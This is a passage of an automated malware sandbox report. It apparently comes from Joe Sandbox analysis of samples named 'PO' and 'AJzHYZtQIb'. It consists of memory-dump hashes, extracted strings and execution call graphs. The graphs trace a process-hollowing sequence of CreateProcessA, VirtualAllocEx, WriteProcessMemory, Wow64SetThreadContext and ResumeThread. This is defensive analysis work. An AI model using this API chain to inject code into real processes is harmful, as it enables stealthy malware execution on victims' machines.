                        • Opcode Fuzzy Hash: 99be257908636465d4d3ff4a00088436d692a0f4b5321c24f9d9cefca5fa2886
                        • Instruction Fuzzy Hash: 6B210671500244DFCB16EF94D9C0F26BF69FB88318F24C669EA090B656C33AD416CBA1
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2274933219.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_133d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 692c2c17390882e2cd8e6013d3a37fd3273ac3edfa6e4830c9c9180e0739f719
                        • Instruction ID: 034185ce2889702601d27c2349a5654bfdee8eab42d96d2b8e538fe92c8121bb
                        • Opcode Fuzzy Hash: 692c2c17390882e2cd8e6013d3a37fd3273ac3edfa6e4830c9c9180e0739f719
                        • Instruction Fuzzy Hash: AB2138B1604204DFDB01DF58D5C0B2ABF69FBC4338F60C569E8494B346C33AD806CAA2
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2274933219.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_133d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2b2283ab0f2d1fd99905d82909ea14ae88e6e105d978bd2a3d9d4e3eb376347c
                        • Instruction ID: eb758fbe9c599f12d29dd978d4e21def8d2f780884b832925a31e6973af381a7
                        • Opcode Fuzzy Hash: 2b2283ab0f2d1fd99905d82909ea14ae88e6e105d978bd2a3d9d4e3eb376347c
                        • Instruction Fuzzy Hash: 43212271504204DFEB05CF68D5C0B26BBA9FBC831CF60C56DE90A0B692C73AD406CA62
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2274881355.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_132d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b4df52cb15700b59c5b6b401fa95ea1d4e97f6e18881beb99e30f99f1fcf6035
                        • Instruction ID: 208ecede993338e4b14143f42402894b94d6a51088bfb43bb9bc0a1428faa75f
                        • Opcode Fuzzy Hash: b4df52cb15700b59c5b6b401fa95ea1d4e97f6e18881beb99e30f99f1fcf6035
                        • Instruction Fuzzy Hash: 8421CD72404280DFCB06DF44D9C4B16BF72FB88318F2486A9DD480A657C33AE426CBA2
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2274933219.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_133d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                        • Instruction ID: 4fd33c4fa9d830df09742baccd6c36adddec724f5cf2396cc7a3de3b83aacba7
                        • Opcode Fuzzy Hash: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                        • Instruction Fuzzy Hash: 7611C176504280CFDB12CF54D5C4B19FF71FB84328F24C6AAD8494B656C33AD80ACBA2
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2274933219.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_133d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                        • Instruction ID: 20983c979f87cd702483d60d69354d32d10373ec9dfcb421ef9b5618549bc59e
                        • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                        • Instruction Fuzzy Hash: 0211D075504240CFDB02CF58C5C4B15BF72FB84318F24C6A9D9494B292C33AD44ACB62
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2274881355.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_132d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ffad1131d37f92ab1657bb4a5bfd86435ff58ccf94588a3309e85ac1073c422d
                        • Instruction ID: 2d2f0a89cb0ac2519cf3cf9ce7689e76f2617965512a9fa6648e8b1a4b372c4a
                        • Opcode Fuzzy Hash: ffad1131d37f92ab1657bb4a5bfd86435ff58ccf94588a3309e85ac1073c422d
                        • Instruction Fuzzy Hash: F8012B31109354DAF720AA99DD84B67FF9CEF45339F18C46AED090E286C2799840C6B1
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2274881355.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_132d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2c6a90f374646274798da71e8c1fa3b6862babfb7627fce4e4d80d011252d0fd
                        • Instruction ID: 46e6d42c28f51866e9ec3e35133abbf2e975f8af7392ce27e0fb434cd40a2e4b
                        • Opcode Fuzzy Hash: 2c6a90f374646274798da71e8c1fa3b6862babfb7627fce4e4d80d011252d0fd
                        • Instruction Fuzzy Hash: 1EF0F671004354DEE7208E0ADC84B62FFA8EF45739F18C45AED0D0F286C2799840CAB0
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2291750608.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_69c0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                        • API String ID: 0-1273862796
                        • Opcode ID: 981bb6536d9c2a81dd68228ef8790a1db337a58cd9418c4937910ae66aa1fcb1
                        • Instruction ID: b0c3b879ef6a0f55bf2a2e0d9422306dae853feab5849bb9e7fa6eda5b57cf4e
                        • Opcode Fuzzy Hash: 981bb6536d9c2a81dd68228ef8790a1db337a58cd9418c4937910ae66aa1fcb1
                        • Instruction Fuzzy Hash: 4791DE30B00205CFDB44CB69C954ABEBBF6BF88710F14845AE806977A1CB3ADC41CB96

                        Execution Graph

                        Execution Coverage:11.1%
                        Dynamic/Decrypted Code Coverage:99%
                        Signature Coverage:0%
                        Total number of Nodes:297
                        Total number of Limit Nodes:19
                        execution_graph 42803 7aa447a 42804 7aa4474 42803->42804 42805 7aa4464 42803->42805 42805->42804 42808 7aa6963 42805->42808 42827 7aa6970 42805->42827 42809 7aa6970 42808->42809 42815 7aa69ae 42809->42815 42846 7aa6f60 42809->42846 42851 7aa7549 42809->42851 42859 7aa7108 42809->42859 42864 7aa7008 42809->42864 42869 7aa708a 42809->42869 42873 7aa75ea 42809->42873 42878 7aa70bc 42809->42878 42883 7aa711b 42809->42883 42887 7aa727b 42809->42887 42892 7aa6ec4 42809->42892 42900 7aa6f84 42809->42900 42905 7aa71c6 42809->42905 42910 7aa6e26 42809->42910 42915 7aa6fc6 42809->42915 42920 7aa6dc1 42809->42920 42924 7aa74c1 42809->42924 42815->42804 42828 7aa698a 42827->42828 42829 7aa75ea 2 API calls 42828->42829 42830 7aa708a 2 API calls 42828->42830 42831 7aa7008 2 API calls 42828->42831 42832 7aa7108 2 API calls 42828->42832 42833 7aa7549 4 API calls 42828->42833 42834 7aa69ae 42828->42834 42835 7aa6f60 2 API calls 42828->42835 42836 7aa74c1 6 API calls 42828->42836 42837 7aa6dc1 2 API calls 42828->42837 42838 7aa6fc6 2 API calls 42828->42838 42839 7aa6e26 2 API calls 42828->42839 42840 7aa71c6 2 API calls 42828->42840 42841 7aa6f84 2 API calls 42828->42841 42842 7aa6ec4 4 API calls 42828->42842 42843 7aa727b 2 API calls 42828->42843 42844 7aa711b 2 API calls 42828->42844 42845 7aa70bc 2 API calls 42828->42845 42829->42834 42830->42834 42831->42834 42832->42834 42833->42834 42834->42804 42835->42834 42836->42834 42837->42834 42838->42834 42839->42834 42840->42834 42841->42834 42842->42834 42843->42834 42844->42834 42845->42834 42847 7aa6e1c 42846->42847 42847->42846 42848 7aa6e2e 42847->42848 42936 7aa3dc9 42847->42936 42940 7aa3dd0 42847->42940 42848->42815 42852 7aa6ee3 42851->42852 42944 7aa3a98 42852->42944 42948 7aa3a90 42852->42948 42853 7aa6e2e 42853->42815 42854 7aa6e1c 42854->42853 42857 7aa3dc9 ReadProcessMemory 42854->42857 42858 7aa3dd0 ReadProcessMemory 42854->42858 42857->42854 42858->42854 42860 7aa710b 42859->42860 42861 7aa7125 42859->42861 42952 7aa3b48 42861->42952 42956 7aa3b40 42861->42956 42865 7aa702b 42864->42865 42960 7aa3cd9 42865->42960 42964 7aa3ce0 42865->42964 42866 7aa75cb 42968 7aa7a03 42869->42968 42973 7aa7a10 42869->42973 42870 7aa70a6 42870->42815 42874 7aa6e1c 42873->42874 42875 7aa6e2e 42874->42875 42876 7aa3dc9 ReadProcessMemory 42874->42876 42877 7aa3dd0 ReadProcessMemory 42874->42877 42875->42815 42876->42874 42877->42874 42879 7aa6e1c 42878->42879 42880 7aa6e2e 42879->42880 42881 7aa3dc9 ReadProcessMemory 42879->42881 42882 7aa3dd0 ReadProcessMemory 42879->42882 42880->42815 42881->42879 42882->42879 42884 7aa7135 42883->42884 42885 7aa3b48 Wow64SetThreadContext 42883->42885 42886 7aa3b40 Wow64SetThreadContext 42883->42886 42885->42884 42886->42884 42888 7aa6e1c 42887->42888 42889 7aa6e2e 42888->42889 42890 7aa3dc9 ReadProcessMemory 42888->42890 42891 7aa3dd0 ReadProcessMemory 42888->42891 42889->42815 42890->42888 42891->42888 42893 7aa6eca 42892->42893 42898 7aa3a98 ResumeThread 42893->42898 42899 7aa3a90 ResumeThread 42893->42899 42894 7aa6e1c 42895 7aa6e2e 42894->42895 42896 7aa3dc9 ReadProcessMemory 42894->42896 42897 7aa3dd0 ReadProcessMemory 42894->42897 42895->42815 42896->42894 42897->42894 42898->42894 42899->42894 42901 7aa6e1c 42900->42901 42902 7aa6e2e 42901->42902 42903 7aa3dc9 ReadProcessMemory 42901->42903 42904 7aa3dd0 ReadProcessMemory 42901->42904 42902->42815 42903->42901 42904->42901 42906 7aa71cf 42905->42906 42908 7aa3cd9 WriteProcessMemory 42906->42908 42909 7aa3ce0 WriteProcessMemory 42906->42909 42907 7aa7674 42908->42907 42909->42907 42911 7aa6e1c 42910->42911 42912 7aa6e2e 42911->42912 42913 7aa3dc9 ReadProcessMemory 42911->42913 42914 7aa3dd0 ReadProcessMemory 42911->42914 42912->42815 42913->42911 42914->42911 42917 7aa6fd3 42915->42917 42916 7aa72eb 42918 7aa3cd9 WriteProcessMemory 42917->42918 42919 7aa3ce0 WriteProcessMemory 42917->42919 42918->42916 42919->42916 42986 7aa3f68 42920->42986 42990 7aa3f5c 42920->42990 42925 7aa74ce 42924->42925 42926 7aa6ee2 42924->42926 42930 7aa3b48 Wow64SetThreadContext 42925->42930 42931 7aa3b40 Wow64SetThreadContext 42925->42931 42927 7aa7701 42926->42927 42934 7aa3a98 ResumeThread 42926->42934 42935 7aa3a90 ResumeThread 42926->42935 42927->42815 42928 7aa6e1c 42929 7aa6e2e 42928->42929 42932 7aa3dc9 ReadProcessMemory 42928->42932 42933 7aa3dd0 ReadProcessMemory 42928->42933 42929->42815 42930->42926 42931->42926 42932->42928 42933->42928 42934->42928 42935->42928 42937 7aa3e1b ReadProcessMemory 42936->42937 42939 7aa3e5f 42937->42939 42939->42847 42941 7aa3e1b ReadProcessMemory 42940->42941 42943 7aa3e5f 42941->42943 42943->42847 42945 7aa3ad8 ResumeThread 42944->42945 42947 7aa3b09 42945->42947 42947->42854 42949 7aa3a98 ResumeThread 42948->42949 42951 7aa3b09 42949->42951 42951->42854 42953 7aa3b8d Wow64SetThreadContext 42952->42953 42955 7aa3bd5 42953->42955 42955->42860 42957 7aa3b48 Wow64SetThreadContext 42956->42957 42959 7aa3bd5 42957->42959 42959->42860 42961 7aa3ce0 WriteProcessMemory 42960->42961 42963 7aa3d7f 42961->42963 42963->42866 42965 7aa3d28 WriteProcessMemory 42964->42965 42967 7aa3d7f 42965->42967 42967->42866 42969 7aa7a10 42968->42969 42978 7aa3c18 42969->42978 42982 7aa3c20 42969->42982 42970 7aa7a44 42970->42870 42974 7aa7a25 42973->42974 42976 7aa3c18 VirtualAllocEx 42974->42976 42977 7aa3c20 VirtualAllocEx 42974->42977 42975 7aa7a44 42975->42870 42976->42975 42977->42975 42979 7aa3c20 VirtualAllocEx 42978->42979 42981 7aa3c9d 42979->42981 42981->42970 42983 7aa3c60 VirtualAllocEx 42982->42983 42985 7aa3c9d 42983->42985 42985->42970 42987 7aa3ff1 42986->42987 42987->42987 42988 7aa4156 CreateProcessA 42987->42988 42989 7aa41b3 42988->42989 42991 7aa3f05 42990->42991 42992 7aa3f66 42990->42992 42992->42992 42993 7aa4156 CreateProcessA 42992->42993 42994 7aa41b3 42993->42994 42786 7aa7ba8 42787 7aa7d68 42786->42787 42790 7aa7bce 42786->42790 42788 7aa7d33 42790->42788 42791 7aa6098 42790->42791 42792 7aa7e28 PostMessageW 42791->42792 42793 7aa7e94 42792->42793 42793->42790 42794 7aa8268 42795 7aa826b 42794->42795 42796 7aa823b 42794->42796 42799 7aa8278 42796->42799 42797 7aa825d 42800 7aa82a3 42799->42800 42801 7aa8321 42800->42801 42802 7aa6098 PostMessageW 42800->42802 42801->42797 42802->42801 43005 2d64670 43006 2d6467a 43005->43006 43010 2d64b68 43005->43010 43015 2d64230 43006->43015 43008 2d64695 43011 2d64b8d 43010->43011 43019 2d64c78 43011->43019 43023 2d64c68 43011->43023 43016 2d6423b 43015->43016 43031 2d67f8c 43016->43031 43018 2d68201 43018->43008 43021 2d64c9f 43019->43021 43020 2d64d7c 43020->43020 43021->43020 43027 2d64850 43021->43027 43025 2d64c75 43023->43025 43024 2d64d7c 43024->43024 43025->43024 43026 2d64850 CreateActCtxA 43025->43026 43026->43024 43028 2d65d08 CreateActCtxA 43027->43028 43030 2d65dcb 43028->43030 43030->43030 43032 2d67f97 43031->43032 43035 2d67fcc 43032->43035 43034 2d682dd 43034->43018 43036 2d67fd7 43035->43036 43039 2d67ffc 43036->43039 43038 2d683ba 43038->43034 43040 2d68007 43039->43040 43043 2d6802c 43040->43043 43042 2d684ad 43042->43038 43044 2d68037 43043->43044 43046 2d68d8b 43044->43046 43049 2d6b438 43044->43049 43045 2d68dc9 43045->43042 43046->43045 43053 2d6d538 43046->43053 43057 2d6b470 43049->43057 43060 2d6b460 43049->43060 43050 2d6b44e 43050->43046 43054 2d6d559 43053->43054 43055 2d6d57d 43054->43055 43084 2d6d6e8 43054->43084 43055->43045 43064 2d6b557 43057->43064 43058 2d6b47f 43058->43050 43061 2d6b470 43060->43061 43063 2d6b557 2 API calls 43061->43063 43062 2d6b47f 43062->43050 43063->43062 43065 2d6b579 43064->43065 43067 2d6b59c 43064->43067 43065->43067 43072 2d6b7f0 43065->43072 43076 2d6b800 43065->43076 43066 2d6b594 43066->43067 43068 2d6b7a0 GetModuleHandleW 43066->43068 43067->43058 43069 2d6b7cd 43068->43069 43069->43058 43073 2d6b800 43072->43073 43075 2d6b839 43073->43075 43080 2d6a908 43073->43080 43075->43066 43077 2d6b814 43076->43077 43078 2d6a908 LoadLibraryExW 43077->43078 43079 2d6b839 43077->43079 43078->43079 43079->43066 43081 2d6b9e0 LoadLibraryExW 43080->43081 43083 2d6ba59 43081->43083 43083->43075 43086 2d6d6f5 43084->43086 43085 2d6d72f 43085->43055 43086->43085 43088 2d6c2c0 43086->43088 43089 2d6c2cb 43088->43089 43090 2d6e448 43089->43090 43092 2d6d8e4 43089->43092 43093 2d6d8ef 43092->43093 43094 2d6802c 4 API calls 43093->43094 43095 2d6e4b7 43094->43095 43099 5460528 43095->43099 43105 5460510 43095->43105 43096 2d6e4f1 43096->43090 43100 5460559 43099->43100 43102 5460659 43099->43102 43101 5460565 43100->43101 43103 5461370 CreateWindowExW CreateWindowExW 43100->43103 43104 5461380 CreateWindowExW CreateWindowExW 43100->43104 43101->43096 43102->43096 43103->43102 43104->43102 43107 5460528 43105->43107 43106 5460565 43106->43096 43107->43106 43108 5461370 CreateWindowExW CreateWindowExW 43107->43108 43109 5461380 CreateWindowExW CreateWindowExW 43107->43109 43108->43106 43109->43106 43110 124d01c 43111 124d034 43110->43111 43112 124d08e 43111->43112 43117 54631c8 43111->43117 43122 5462468 43111->43122 43127 5462458 43111->43127 43132 54631d8 43111->43132 43118 54631d8 43117->43118 43119 5463237 43118->43119 43137 5463350 43118->43137 43142 5463360 43118->43142 43119->43119 43123 546248e 43122->43123 43125 54631c8 2 API calls 43123->43125 43126 54631d8 2 API calls 43123->43126 43124 54624af 43124->43112 43125->43124 43126->43124 43128 546248e 43127->43128 43130 54631c8 2 API calls 43128->43130 43131 54631d8 2 API calls 43128->43131 43129 54624af 43129->43112 43130->43129 43131->43129 43133 5463205 43132->43133 43134 5463237 43133->43134 43135 5463350 2 API calls 43133->43135 43136 5463360 2 API calls 43133->43136 43134->43134 43135->43134 43136->43134 43139 5463355 43137->43139 43138 5463400 43138->43119 43147 5463408 43139->43147 43151 5463418 43139->43151 43144 5463374 43142->43144 43143 5463400 43143->43119 43145 5463408 2 API calls 43144->43145 43146 5463418 2 API calls 43144->43146 43145->43143 43146->43143 43148 5463418 43147->43148 43149 5463429 43148->43149 43154 54648c5 43148->43154 43149->43138 43152 5463429 43151->43152 43153 54648c5 2 API calls 43151->43153 43152->43138 43153->43152 43155 54648ce 43154->43155 43156 546498a 43155->43156 43160 54649f0 43155->43160 43164 5464a00 43155->43164 43156->43149 43157 54649ea 43157->43149 43161 5464a00 43160->43161 43162 5464a49 43161->43162 43163 5464a9a CallWindowProcW 43161->43163 43162->43157 43163->43162 43165 5464a42 43164->43165 43167 5464a49 43164->43167 43166 5464a9a CallWindowProcW 43165->43166 43165->43167 43166->43167 43167->43157 42995 2d6dc08 42996 2d6dc4e 42995->42996 42999 2d6dde8 42996->42999 43002 2d6c2e0 42999->43002 43003 2d6de50 DuplicateHandle 43002->43003 43004 2d6dd3b 43003->43004

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 780 8d44fe8-8d45013 781 8d45015 780->781 782 8d4501a-8d45060 780->782 781->782 887 8d45065 call 8d45810 782->887 888 8d45065 call 8d45820 782->888 783 8d4506b 889 8d4506c call 8d45860 783->889 890 8d4506c call 8d4585e 783->890 784 8d45072-8d450ad 787 8d450ae 784->787 788 8d450b5-8d450d1 787->788 789 8d450d3 788->789 790 8d450da-8d450db 788->790 789->787 791 8d45124-8d4513a 789->791 792 8d450dd-8d4510d 789->792 793 8d45274-8d45278 789->793 794 8d453f7-8d4540a 789->794 795 8d45350-8d4536b 789->795 796 8d451f1-8d45205 789->796 797 8d4519a-8d451b9 789->797 798 8d453da-8d453f5 789->798 799 8d4513b 789->799 800 8d451bb-8d451de 789->800 801 8d45305-8d4531f 789->801 802 8d45241-8d4526f 789->802 803 8d45321 789->803 804 8d45182-8d45198 789->804 805 8d45382 789->805 806 8d451e3-8d451ec 789->806 807 8d4540c 789->807 808 8d4516d-8d45180 789->808 809 8d4536d-8d45380 789->809 810 8d4510f-8d45122 789->810 811 8d4520a-8d4520e 789->811 812 8d452ab-8d452ba 789->812 813 8d453ab 789->813 790->791 790->792 791->799 792->788 820 8d4527a-8d45289 793->820 821 8d4528b-8d45292 793->821 817 8d453b2-8d453ce 794->817 815 8d45328-8d45344 795->815 816 8d45142-8d4515e 796->816 797->816 798->817 799->816 800->816 801->803 801->805 802->816 803->815 804->816 805->813 806->816 836 8d45427 807->836 808->816 809->815 810->788 818 8d45210-8d4521f 811->818 819 8d45221-8d45228 811->819 891 8d452c0 call 8d45e38 812->891 892 8d452c0 call 8d45e29 812->892 813->817 826 8d45346 815->826 827 8d4534d-8d4534e 815->827 829 8d45167-8d45168 816->829 830 8d45160 816->830 832 8d453d7-8d453d8 817->832 833 8d453d0 817->833 835 8d4522f-8d4523c 818->835 819->835 822 8d45299-8d452a6 820->822 821->822 822->816 826->794 826->795 826->798 826->803 826->805 826->807 826->809 826->813 838 8d456fc-8d456ff 826->838 839 8d45598-8d455e7 826->839 840 8d45579 826->840 841 8d45462 826->841 842 8d454c3-8d45525 826->842 843 8d4548e 826->843 827->795 827->805 829->801 829->808 830->793 830->794 830->795 830->796 830->797 830->798 830->799 830->800 830->801 830->802 830->803 830->804 830->805 830->806 830->807 830->808 830->809 830->811 830->812 830->813 832->798 832->807 833->794 833->798 833->807 833->813 833->836 833->838 833->839 833->840 833->841 833->842 833->843 844 8d45561-8d45574 833->844 845 8d45762-8d45769 833->845 846 8d4564a-8d456b2 833->846 847 8d454ab-8d454be 833->847 835->816 848 8d4542e-8d4544a 836->848 901 8d45702 call 8d49298 838->901 902 8d45702 call 8d492a8 838->902 903 8d455ed call 8d48348 839->903 904 8d455ed call 8d4833b 839->904 905 8d4557b call 7aa7b5b 840->905 906 8d4557b call 7aa7b68 840->906 897 8d45465 call 8d45e38 841->897 898 8d45465 call 8d45e29 841->898 885 8d4552b call 8d48348 842->885 886 8d4552b call 8d4833b 842->886 899 8d45491 call 8d4aa58 843->899 900 8d45491 call 8d4aa49 843->900 844->848 873 8d456b4-8d456c0 846->873 874 8d456dc 846->874 847->848 850 8d4545c-8d4545d 848->850 851 8d4544c 848->851 849 8d452c6-8d452d2 907 8d452d8 call 8d45f14 849->907 908 8d452d8 call 8d45ed8 849->908 909 8d452d8 call 8d45ec8 849->909 850->841 850->845 851->836 851->838 851->839 851->840 851->841 851->842 851->843 851->844 851->845 851->846 851->847 852 8d4546b-8d4548c 852->848 853 8d45497-8d454a9 853->848 856 8d45708-8d4571f 893 8d45724 call 8d49840 856->893 894 8d45724 call 8d496d0 856->894 895 8d45724 call 8d495f3 856->895 896 8d45724 call 8d461bc 856->896 857 8d45581-8d45593 859 8d452de-8d45300 859->816 862 8d4572a-8d45730 866 8d4573c-8d4575d 862->866 870 8d455f3-8d45600 871 8d45602-8d4560e 870->871 872 8d4562a 870->872 875 8d45610-8d45616 871->875 876 8d45618-8d4561e 871->876 877 8d45630-8d45645 872->877 878 8d456c2-8d456c8 873->878 879 8d456ca-8d456d0 873->879 881 8d456e2-8d456f7 874->881 882 8d45628 875->882 876->882 877->848 883 8d456da 878->883 879->883 880 8d45531-8d4555c 880->848 881->848 882->877 883->881 885->880 886->880 887->783 888->783 889->784 890->784 891->849 892->849 893->862 894->862 895->862 896->862 897->852 898->852 899->853 900->853 901->856 902->856 903->870 904->870 905->857 906->857 907->859 908->859 909->859
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID: 'T$$]q$$]q$$]q$$]q
                        • API String ID: 0-203493588
                        • Opcode ID: 52a3439b1af31c67d80084b5e10c501ce0635a125a6e9418da387e03158ab12a
                        • Instruction ID: aafa4291fdbbff8f926d06e85f509c5a2116cbbb983d799171f5bcad776712b8
                        • Opcode Fuzzy Hash: 52a3439b1af31c67d80084b5e10c501ce0635a125a6e9418da387e03158ab12a
                        • Instruction Fuzzy Hash: 87223674E19218CFDB14CFA9E98469DBBB2FF89341F10A56AD40ABB354DB309942CF14
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID: 'T$$]q$$]q
                        • API String ID: 0-3917162498
                        • Opcode ID: 08a5efda849443fbd5a0de28e98d6c694066e49cffda61a663d7bc507966866a
                        • Instruction ID: a9b403fd8903136635aab8dabfe695f8e0ca44be430932878462458e9c340b0d
                        • Opcode Fuzzy Hash: 08a5efda849443fbd5a0de28e98d6c694066e49cffda61a663d7bc507966866a
                        • Instruction Fuzzy Hash: 4F224574E15218CFDB14CFA9E984A9DBBB2FF89341F10A56AD40AB7354DB309942CF14
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID: 'T$$]q$$]q
                        • API String ID: 0-3917162498
                        • Opcode ID: ea9f7b751f7030bfb43c28b692dbee90c12982a3363e4746f05a5643b3a79e7d
                        • Instruction ID: 7ac6626e1d3f3b25ad99c7618e3c6f50cdc4fe9c069f231901d11a416172989b
                        • Opcode Fuzzy Hash: ea9f7b751f7030bfb43c28b692dbee90c12982a3363e4746f05a5643b3a79e7d
                        • Instruction Fuzzy Hash: A5A12C74E15218CFDB14CFA5E98479DBBB2FF88351F2095AAD40AA7354DB309A82CF14
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID: 'T$$]q$$]q
                        • API String ID: 0-3917162498
                        • Opcode ID: 3af945d987bd424c48b2366f6c36d0557991eec6be4c31f907d2f36fa18b31d7
                        • Instruction ID: bc84145135907a8b52da7278a1042bfbb21d2ea6d6855a0861d5c9f36f6bc141
                        • Opcode Fuzzy Hash: 3af945d987bd424c48b2366f6c36d0557991eec6be4c31f907d2f36fa18b31d7
                        • Instruction Fuzzy Hash: 0AA12C74E15218CFDB14CFA5E98479DBBB2FF88351F2095AAD40AA7354DB309982CF14
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID: 'T$$]q$$]q
                        • API String ID: 0-3917162498
                        • Opcode ID: 9f6d0b5fc57e7b6309302d131d3f6062ab0761789f15ac1e5fe1844d50c55523
                        • Instruction ID: 26b2e707c2e6ed37b6403b6f21dd54ba1e606c04f8f70c18457c1b8e8de2f925
                        • Opcode Fuzzy Hash: 9f6d0b5fc57e7b6309302d131d3f6062ab0761789f15ac1e5fe1844d50c55523
                        • Instruction Fuzzy Hash: 9591F874E15218CFDB14CFA5E984B9DBBB2FF88351F1095AAE409A7354DB309982CF14
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c6f7531a6f5759a52fde6a4bacaf8ebe12f6990baf4482fc9a1f8e338833cc1d
                        • Instruction ID: 2409291be342c4d19b0871659340c7c83e2c6c4a0bf91721d0808dfc25d0a6cc
                        • Opcode Fuzzy Hash: c6f7531a6f5759a52fde6a4bacaf8ebe12f6990baf4482fc9a1f8e338833cc1d
                        • Instruction Fuzzy Hash: 6922D471D1061ACBCB15EF69C8506D9FBB1FF99300F1096AAE549B7210EB70AAD5CF80
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8d27b86b42d56e6620eaaf8ff902eb9866f3567cbfd29c6391590479cb95bf9f
                        • Instruction ID: 56bb18bed37a143e2d5cba0cc2d49a9a27302b825cee4973e9c683d2665317b0
                        • Opcode Fuzzy Hash: 8d27b86b42d56e6620eaaf8ff902eb9866f3567cbfd29c6391590479cb95bf9f
                        • Instruction Fuzzy Hash: F502D371D10A1ACBCB15EF69C8506D9FBB1FF99300F1096AAE54977210EB70AAD5CF80
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 19a18239c27469aeb9b8b8a0d52fa753fd9f0c922277745393b33ec98182df7a
                        • Instruction ID: 64cc3733fe4d2c053869ec4e2945c89fcd610239eb7f1bf9d89a94589fe38eff
                        • Opcode Fuzzy Hash: 19a18239c27469aeb9b8b8a0d52fa753fd9f0c922277745393b33ec98182df7a
                        • Instruction Fuzzy Hash: 8C91F475D04219EFCB18CFAAD89089EFFB2FB89351F24A52AD405BB264D7349943CB50

                        Control-flow Graph
